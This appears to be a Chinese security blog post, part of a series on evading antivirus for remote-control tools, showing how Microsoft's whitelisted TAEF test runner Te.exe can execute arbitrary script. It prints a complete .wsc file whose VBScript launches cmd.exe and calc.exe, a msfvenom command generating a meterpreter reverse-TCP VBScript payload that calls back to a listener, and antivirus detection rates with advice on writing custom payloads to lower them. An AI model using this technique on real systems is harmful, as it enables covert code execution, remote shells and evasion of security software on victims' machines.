远控免杀专题(61)-白名单Te.exe执行payload

admin 2022年8月1日00:44:14程序逆向评论8 views2795字阅读9分19秒阅读模式
远控免杀专题(61)-白名单Te.exe执行payload

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!


声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


一、Te.exe介绍

如果安装了TAEF(Test Authoring and Execution Framework)框架并且位于列入白名单的路径中,则可以使用它,需要在计算机上安装Visual Studio和WDK。

微软官方文档:https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/

默认安装位置:

C: program files(x86)Windows Kits10testingRuntimesTAEF

使用脚本语言编写测试,Windows仅支持JScript和VBScript。

远控免杀专题(61)-白名单Te.exe执行payload

二、使用Te.exe执行系统命令

直接使用github上编写好的.wsc文件,执行calc.exe弹出计算机。https://gist.github.com/N3mes1s/5b75a4cd6aa4d41bb742acace2c8ab42#file-datadriventest-wsc

<?xml version="1.0" ?><!-- Te.exe DataDrivenTest.wsc                                                                  --><!-- C:Program Files (x86)Windows Kits10TestingRuntimesTAEF > ./TE.exe DataDrivenTest.wsc --><!-- Test Authoring and Execution Framework v5.8k for x64                                       --><!-- StartGroup: VBSampleTests::TestOne                                                         --><!-- Calling TestOne                                                                            --><!-- EndGroup: VBSampleTests::TestOne [Passed]                                                  --><!-- Summary: Total=1, Passed=1, Failed=0, Blocked=0, Not Run=0, Skipped=0                      --><?component error="true" debug="true"?><package>    <ModuleProperty name="Owner" value="Someone"/>    <component id="VBSampleTests">        <object id="Log" progid="WEX.Logger.Log" />        <reference guid="e65ef678-a232-42a7-8a36-63108d719f31" version="1.0"/>        <TestClassProperty name="DocumentationUrl" value="http://shelltestkb/"/>        <public>            <method name="TestOne">                <TestMethodProperty name="Priority" value="1"/>            </method>       </public>
<script language="VBScript"> <![CDATA[ Function TestOne() Log.Comment("Calling TestOne") CreateObject("WScript.Shell").Run("cmd.exe") strComputer = "." Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2:Win32_Process") objWMIService.Create "calc.exe", null, null, intProcessID Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2") Set colMonitoredProcesses = objWMIService.ExecNotificationQuery _ ("Select * From __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process'") Do Until i = 1 Set objLatestProcess = colMonitoredProcesses.NextEvent If objLatestProcess.TargetInstance.ProcessID = intProcessID Then i = 1 End If Loop End Function ]]> </script> </component></package>

远控免杀专题(61)-白名单Te.exe执行payload

可以替换calc.exe为自己想要执行的命令,比如执行系统powershell命令等等。

三、利用Te.exe执行payload(VT查杀率23/57)

使用msfvenom生成反弹vbs payload。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.100.207 lport=4444 EXITFUNC=thread -f vbs --platform win > test.vbs

替换.wsc文件

远控免杀专题(61)-白名单Te.exe执行payload


执行修改后的.wsc文件。

远控免杀专题(61)-白名单Te.exe执行payload

反弹成功。

远控免杀专题(61)-白名单Te.exe执行payload

打开杀软进行测试,当执行.wsc文件时会报毒,主要是msf生成的payload特征太明显了,可以根据自己的需求编写自己的vbs脚本。

远控免杀专题(61)-白名单Te.exe执行payload

vt查杀率27/57 

远控免杀专题(61)-白名单Te.exe执行payload

四、参考资料

https://gist.github.com/N3mes1s/5b75a4cd6aa4d41bb742acace2c8ab42https://twitter.com/gN3mes1s/status/927792345378099200https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/overview-of-executing-tests




E


N


D




远控免杀专题(61)-白名单Te.exe执行payload


guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

远控免杀专题(61)-白名单Te.exe执行payload


远控免杀专题(61)-白名单Te.exe执行payload


原文始发于微信公众号(白帽子):远控免杀专题(61)-白名单Te.exe执行payload

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月1日00:44:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  远控免杀专题(61)-白名单Te.exe执行payload http://cn-sec.com/archives/1212663.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: